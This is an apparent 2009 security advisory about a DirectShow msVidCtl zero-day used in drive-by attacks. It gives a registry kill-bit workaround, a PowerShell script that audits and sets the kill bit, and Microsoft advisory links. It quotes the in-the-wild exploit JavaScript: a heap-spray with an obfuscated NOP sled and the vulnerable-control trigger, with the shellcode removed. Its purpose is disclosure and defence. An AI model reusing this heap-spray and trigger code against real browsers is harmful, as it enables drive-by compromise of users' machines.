0-day in Microsoft DirectShow (msvidctl.dll) used in drive-by attacks
A 0-day exploit in the msVidCtl component of Microsoft DirectShow is being actively used in drive-by attacks served from thousands of newly compromised web sites, according to CSIS. The exploit code has been published openly on a number of Chinese web sites.
Please keep a watchful eye on your AV and IDS/IPS vendors' updates to ensure coverage as early as possible for this exploit; with the code publicly available it is likely to be widely deployed.
A valid workaround for the attack vector is available: set the kill bit for the vulnerable control's CLSID, which stops Internet Explorer from instantiating it. The registry entry below does this for the msVidCtl CLSID.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400
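As an added example (not from the diary or from CSIS), the following PowerShell function audits whether the kill bit (0x400 in "Compatibility Flags") is set for one or more CLSIDs in both the native ActiveX Compatibility key and the Wow6432Node key used by 32-bit IE on 64-bit Windows, and with -Apply ORs the bit in without clobbering other flags. The function name, its parameters and the Wow6432Node handling are this example's own assumptions; only the msVidCtl CLSID from the diary is built in, other CLSIDs can be passed to -Clsid.

```powershell
# Added example: audit/set the IE kill bit for ActiveX CLSIDs.
# Assumes: run elevated when using -Apply. Reads both registry views so a
# control blocked for 64-bit IE but not for 32-bit IE (or vice versa) shows up.

$KillBit = 0x400   # "Compatibility Flags" bit that blocks IE from instantiating the control

function Test-KillBit {
    param(
        [Parameter(Mandatory)][string[]]$Clsid,   # CLSIDs with or without braces
        [switch]$Apply                            # set the bit where it is missing
    )
    $roots = @(
        'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
        'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
    )
    foreach ($id in $Clsid) {
        $id = '{' + $id.Trim('{}').ToUpper() + '}'
        foreach ($root in $roots) {
            if (-not (Test-Path $root)) { continue }   # no Wow6432Node view on 32-bit Windows
            $key   = Join-Path $root $id
            $flags = 0
            if (Test-Path $key) {
                $val = Get-ItemProperty -Path $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
                if ($val) { $flags = [int]$val.'Compatibility Flags' }
            }
            $set = ($flags -band $KillBit) -ne 0
            if (-not $set -and $Apply) {
                if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
                # Preserve any other compatibility flags already present; only OR in the kill bit
                $flags = $flags -bor $KillBit
                Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $flags -Type DWord
                $set = $true
            }
            [pscustomobject]@{
                Clsid      = $id
                Hive       = $root
                KillBitSet = $set
                Flags      = ('0x{0:X8}' -f $flags)
            }
        }
    }
}

# Audit the msVidCtl CLSID from the diary; add -Apply (elevated) to set the bit
Test-KillBit -Clsid '0955AC62-BF2E-4CBA-A2B9-A63F772D46CF' | Format-Table -AutoSize
```

A row with KillBitSet = False in either hive means that view of IE can still load the control, so check both before treating a machine as mitigated.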
Details of the exploit are available on the CSIS web site, but are included below:
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
[SHELL CODE REMOVED]
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
UPDATE July 6, 2009 19:00 UTC
Microsoft have released an advisory for the exploit; it can be found here:
http://www.microsoft.com/technet/security/advisory/972890.mspx
In addition, they have published a number of blog entries to cover their user base:
http://blogs.technet.com/msrc/default.aspx
http://www.microsoft.com/technet/security/advisory/default.mspx
http://blogs.technet.com/srd/
Comments
Elton
Jul 6th 2009
Stephen
Jul 6th 2009
Can we get the English version for the same?
hcbhatt
Jul 6th 2009
http://translate.google.com/translate?prev=hp&hl=en&js=n&u=http%3A%2F%2Fwww.csis.dk%2Fdk%2Fnyheder%2Fnyheder.asp%3FtekstID%3D799&sl=da&tl=en&history_state0=
hcbhatt
Jul 6th 2009
http://www.microsoft.com/technet/security/advisory/972890.mspx
This is still an early notice, but includes 45 CLASSIDs for this control, which they do not believe are designed to be exposed via Internet Explorer and thus should be safe to killbit.
Andrew from Vancouver
Jul 6th 2009